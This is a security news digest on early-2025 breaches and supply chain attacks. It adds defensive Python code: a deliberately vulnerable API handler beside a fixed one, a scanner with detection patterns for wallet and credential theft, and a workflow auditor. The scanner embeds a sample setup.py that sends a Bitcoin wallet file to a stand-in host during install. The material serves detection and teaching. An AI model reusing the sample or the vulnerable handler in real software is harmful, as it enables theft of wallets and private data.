AboutDFIR.com – The Definitive Compendium Project
Digital Forensics & Incident Response


InfoSec News Nuggets 4/4/2025

Oracle privately confirms Cloud breach to customers

Oracle has finally acknowledged to some customers that attackers have stolen old client credentials after breaching a “legacy environment” last used in 2017, Bloomberg reported. However, while Oracle told clients this is old legacy data that is not sensitive, the threat actor behind the attack has shared data with BleepingComputer from the end of 2024 and posted newer records from 2025 on a hacking forum. According to Bloomberg, the company also informed clients that cybersecurity firm CrowdStrike and the FBI are investigating the incident.


Verizon Call Filter API flaw exposed customers’ incoming call history

A vulnerability in Verizon’s Call Filter feature allowed customers to access the incoming call logs for another Verizon Wireless number through an unsecured API request. The flaw was discovered by security researcher Evan Connelly on February 22, 2025, and was fixed by Verizon sometime in the following month; the total period of exposure is unknown. Verizon’s Call Filter app is a free utility that offers users spam detection and automatic call blocking. A paid version (Plus) adds a spam lookup and risk meter, the ability to block by type of caller, and caller ID for unknown numbers.
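The bug class behind this report is broken object-level authorization: the server checks that the caller has a valid session but looks up whatever number the request names. The following is an added illustration written for this post, not Verizon's API or code; the handler names, tokens, numbers and call records are all constructed. It puts the vulnerable handler beside a hardened one and includes the cross-account enumeration check a tester would run against both.

```python
"""Vulnerable versus hardened call-history lookup (constructed example)."""
import re

# Constructed sample data: subscriber (E.164) -> incoming calls (timestamp, caller)
CALL_LOGS = {
    "+15551230001": [("2025-02-22T10:01:00Z", "+15557770001")],
    "+15551230002": [("2025-02-22T11:15:00Z", "+15557770002")],
}
# Constructed bearer tokens -> the subscriber each token was issued to
SESSIONS = {"tok-alice": "+15551230001", "tok-bob": "+15551230002"}

E164 = re.compile(r"^\+[1-9]\d{6,14}$")


def _subscriber_for(token):
    """Resolve a bearer token to its subscriber, or None if unknown."""
    return SESSIONS.get(token)


def call_history_vulnerable(token, number):
    """Returns (status, body).  The token is checked only for validity; the
    record returned is whatever `number` the client supplied, so any valid
    session can read any other subscriber's log (BOLA / IDOR)."""
    if _subscriber_for(token) is None:
        return 401, None
    return 200, CALL_LOGS.get(number, [])


def call_history_fixed(token, number):
    """Hardened handler: the object key is derived from the session, and a
    client-supplied number is accepted only if it equals that identity.
    A mismatch is a 403 that reveals nothing about whether `number` exists."""
    subscriber = _subscriber_for(token)
    if subscriber is None:
        return 401, None
    if not E164.match(number or "") or number != subscriber:
        return 403, None
    return 200, CALL_LOGS.get(subscriber, [])


def cross_account_leaks(handler):
    """The check a tester runs: with every session, request every known
    number and count responses that hand back someone else's log."""
    leaks = 0
    for token, own_number in SESSIONS.items():
        for number in CALL_LOGS:
            status, _ = handler(token, number)
            if number != own_number and status == 200:
                leaks += 1
    return leaks


if __name__ == "__main__":
    print("vulnerable cross-account reads:", cross_account_leaks(call_history_vulnerable))
    print("fixed cross-account reads:", cross_account_leaks(call_history_fixed))
```

The cleaner design removes the number parameter altogether (a `/me/calls` style endpoint), so there is no client-controlled object key to validate; the fixed handler above keeps the parameter only to show the check.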


Suspected Chinese spies right now hijacking buggy Ivanti gear – for third time in 3 years

Suspected Chinese government spies have been exploiting a newly disclosed critical bug in Ivanti VPN appliances since mid-March. This is now at least the third time in three years these snoops have been pwning these products. Plus, post-exploit, the Beijing-backed crew deployed on compromised Ivanti equipment two new malware strains along with variants of the Spawn software nasty, we’re told. Ivanti today detailed the under-attack 9.0-out-of-10-severity vulnerability, tracked as CVE-2025-22457, and said it affects Ivanti Connect Secure (version 22.7R2.5 and earlier), Pulse Connect Secure 9.x (end-of-support as of December 31), Ivanti Policy Secure, and ZTA gateways.


Malicious Python packages target popular Bitcoin library

When it comes to the frequency and sophistication of software supply chain attacks, few industries can compare with cryptocurrency. As ReversingLabs’ 2025 Software Supply Chain Security Report notes, 2024 saw close to two dozen sustained supply chain campaigns designed to compromise cryptocurrency applications, cryptocurrency owners’ wallets, and cryptocurrency trading platforms. The trend continues in 2025. A string of malicious software supply chain campaigns has targeted developers working on crypto-related applications. The latest popped onto the RL research team’s radar last week when automated machine-learning (ML) detection features in RL’s Spectra platform identified two malicious Python packages, posted to the Python Package Index (PyPI), containing code designed to exfiltrate sensitive database files. 
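The signal that makes packages like these stand out is the conjunction of two behaviours in install-time or import-time code: reading files from locations where wallets and credential databases live, and sending bytes to a remote host. The following is an added heuristic written for this post, not ReversingLabs' detection and not the code of the packages it describes; it walks a module's AST and reports that combination. Both source samples embedded in it are constructed.

```python
"""Static triage of a Python module for file-read plus network-exfiltration patterns."""
import ast

FILE_READ_CALLS = {"open", "glob.glob", "os.walk", "os.listdir",
                   "shutil.copy", "shutil.copyfile", "pathlib.Path"}
NETWORK_CALLS = {"requests.post", "requests.put", "requests.get",
                 "urllib.request.urlopen", "socket.socket",
                 "http.client.HTTPSConnection", "http.client.HTTPConnection"}
EVAL_CALLS = {"exec", "eval", "base64.b64decode"}
# Substrings of file names that suggest wallet or credential material
SENSITIVE_HINTS = ("wallet", ".db", ".sqlite", "keystore", "login data",
                   "local state", ".env", "id_rsa")


def _aliases(tree):
    """Map local names to the module path they were imported from."""
    names = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                local = a.asname or a.name.split(".")[0]
                names[local] = a.name if a.asname else local
        elif isinstance(node, ast.ImportFrom):
            for a in node.names:
                names[a.asname or a.name] = f"{node.module or ''}.{a.name}"
    return names


def _qualname(func, aliases):
    """Best-effort dotted name for a call target, e.g. requests.post."""
    parts = []
    while isinstance(func, ast.Attribute):
        parts.append(func.attr)
        func = func.value
    if not isinstance(func, ast.Name):
        return None
    parts.append(aliases.get(func.id, func.id))
    return ".".join(reversed(parts))


def scan_source(src):
    """Return the sources, sinks and strings found, plus a verdict: suspicious
    when a network sink coexists with file reads or sensitive-looking paths."""
    tree = ast.parse(src)
    aliases = _aliases(tree)
    report = {"file_reads": [], "network_sinks": [], "sensitive_strings": [], "eval_calls": []}
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = _qualname(node.func, aliases)
            if name in FILE_READ_CALLS:
                report["file_reads"].append(name)
            elif name in NETWORK_CALLS:
                report["network_sinks"].append(name)
            elif name in EVAL_CALLS:
                report["eval_calls"].append(name)
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if any(h in node.value.lower() for h in SENSITIVE_HINTS):
                report["sensitive_strings"].append(node.value)
    report["suspicious"] = bool(report["network_sinks"]) and bool(
        report["file_reads"] or report["sensitive_strings"])
    return report


# Constructed sample: a setup.py that harvests a wallet file at install time
MALICIOUS_SAMPLE = '''
import os, glob, requests
from setuptools import setup

def _collect():
    blobs = []
    for path in glob.glob(os.path.expanduser("~/.bitcoin/wallet.dat")):
        with open(path, "rb") as fh:
            blobs.append(fh.read())
    return blobs

for blob in _collect():
    requests.post("https://collector.example.invalid/up", data=blob)

setup(name="totally-legit", version="0.0.1")
'''

# Constructed sample: an ordinary setup.py that only reads its README
BENIGN_SAMPLE = '''
from setuptools import setup
with open("README.md") as fh:
    long_description = fh.read()
setup(name="legit", version="1.0", long_description=long_description)
'''

if __name__ == "__main__":
    for label, src in (("malicious", MALICIOUS_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, scan_source(src))
```

The benign sample also reads a file, which is why the verdict requires a sink as well as a source; a real pipeline would run this over every `.py` in the sdist and wheel, including `setup.py`, `__init__.py` and anything referenced from `cmdclass`, since the harvesting code often runs during `pip install` rather than on import.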


State Bar of Texas Says Personal Information Stolen in Ransomware Attack

The State Bar of Texas this week started sending notification letters to thousands of individuals to notify them of a data breach resulting from a February ransomware attack. According to the notification letters, suspicious activity on the association’s network on February 12 prompted it to initiate response procedures and launch an investigation. The association determined that a threat actor had access to its network between January 28 and February 9 and stole certain files, including ones containing personal information. The compromised information, the State Bar of Texas says, varies by individual, and the copies of the notification letter submitted to Attorney General offices have been redacted in this regard.


SpotBugs Access Token Theft Identified as Root Cause of GitHub Supply Chain Attack

The cascading supply chain attack that initially targeted Coinbase before widening to all users of the “tj-actions/changed-files” GitHub Action has been traced further back to the theft of a personal access token (PAT) related to SpotBugs. “The attackers obtained initial access by taking advantage of the GitHub Actions workflow of SpotBugs, a popular open-source tool for static analysis of bugs in code,” Palo Alto Networks Unit 42 said in an update this week. “This enabled the attackers to move laterally between SpotBugs repositories, until obtaining access to reviewdog.” There is evidence to suggest that the malicious activity began as far back as November 2024, although the attack against Coinbase did not take place until March 2025.
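The summary above does not say which workflow misconfiguration was abused at SpotBugs, so the following added example (written for this post; not SpotBugs, reviewdog or tj-actions code) audits for the misconfiguration that most often leaks a token from a workflow: a `pull_request_target` job that checks out the pull request head and then runs it, which executes a fork's code with the base repository's secrets and `GITHUB_TOKEN`. It also flags actions referenced by a mutable tag rather than a commit SHA, the pinning that limits blast radius when a popular action is compromised. The workflow is taken as the dict a YAML loader produces; both workflows below are constructed, and the pinned SHA is a placeholder.

```python
"""Audit a GitHub Actions workflow dict for fork-code-with-secrets and unpinned actions."""
import re

SHA_RE = re.compile(r"^[0-9a-f]{40}$")
RISKY_TRIGGERS = {"pull_request_target", "workflow_run", "issue_comment"}
PR_HEAD_RE = re.compile(r"github\.event\.pull_request\.head|github\.head_ref")
SECRET_RE = re.compile(r"\$\{\{\s*secrets\.")


def _triggers(wf):
    """Set of event names the workflow runs on.  PyYAML loads a bare `on:`
    key as the boolean True, so both spellings are accepted."""
    on = wf.get("on", wf.get(True, {}))
    if isinstance(on, str):
        return {on}
    if isinstance(on, list):
        return set(on)
    return set(on or {})


def _step_text(step):
    """Everything in a step where a secret expression could appear."""
    parts = [str(step.get("run", ""))]
    for key in ("with", "env"):
        parts.extend(str(v) for v in (step.get(key) or {}).values())
    return " ".join(parts)


def audit_workflow(wf):
    """Return a list of human-readable findings; empty means nothing flagged."""
    findings = []
    risky = sorted(_triggers(wf) & RISKY_TRIGGERS)
    jobs = wf.get("jobs") or {}
    if "permissions" not in wf and any("permissions" not in j for j in jobs.values()):
        findings.append("no permissions block; GITHUB_TOKEN scope falls back to the repository default")
    for job_name, job in jobs.items():
        untrusted_checkout = None
        secret_steps = []
        for i, step in enumerate(job.get("steps") or []):
            uses = step.get("uses")
            if uses:
                ref = uses.split("@", 1)[1] if "@" in uses else ""
                if not SHA_RE.match(ref):
                    findings.append(f"{job_name}[{i}]: '{uses}' is not pinned to a commit SHA")
                with_ref = str((step.get("with") or {}).get("ref", ""))
                if uses.startswith("actions/checkout") and PR_HEAD_RE.search(with_ref):
                    untrusted_checkout = i
            if SECRET_RE.search(_step_text(step)):
                secret_steps.append(i)
        if risky and untrusted_checkout is not None:
            findings.append(
                f"{job_name}[{untrusted_checkout}]: checks out the PR head under {risky}; "
                f"later steps run fork code with base-repo secrets and GITHUB_TOKEN "
                f"(secrets referenced in steps {secret_steps})")
    return findings


# Constructed weak workflow, shaped as PyYAML would load it (note the True key)
WEAK = {
    "name": "ci",
    True: {"pull_request_target": {"types": ["opened", "synchronize"]}},
    "jobs": {"build": {"runs-on": "ubuntu-latest", "steps": [
        {"uses": "actions/checkout@v4",
         "with": {"ref": "${{ github.event.pull_request.head.sha }}"}},  # fork code on disk
        {"uses": "example-org/example-action@v1"},  # hypothetical action, mutable tag
        {"run": "./gradlew build",                   # runs whatever the fork put in the tree
         "env": {"PUBLISH_TOKEN": "${{ secrets.PUBLISH_TOKEN }}"}},
    ]}},
}

PIN = "0123456789abcdef0123456789abcdef01234567"  # placeholder; pin to the real commit
# Constructed hardened workflow: pull_request runs in the fork's context without
# base-repo secrets, the token is read-only, and every action is SHA-pinned
HARDENED = {
    "name": "ci",
    True: {"pull_request": {}},
    "permissions": {"contents": "read"},
    "jobs": {"build": {"runs-on": "ubuntu-latest", "steps": [
        {"uses": f"actions/checkout@{PIN}"},
        {"uses": f"example-org/example-action@{PIN}"},
        {"run": "./gradlew build"},
    ]}},
}

if __name__ == "__main__":
    for label, wf in (("weak", WEAK), ("hardened", HARDENED)):
        print(label, audit_workflow(wf) or ["ok"])
```

To run it against real files, load each `.github/workflows/*.yml` with `yaml.safe_load` and pass the result in; the `True` key handling is there precisely because that loader renames `on`. Where a job genuinely needs `pull_request_target` (for example to label PRs), the checkout step should not reference the PR head, and the job should carry its own minimal `permissions:` block.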
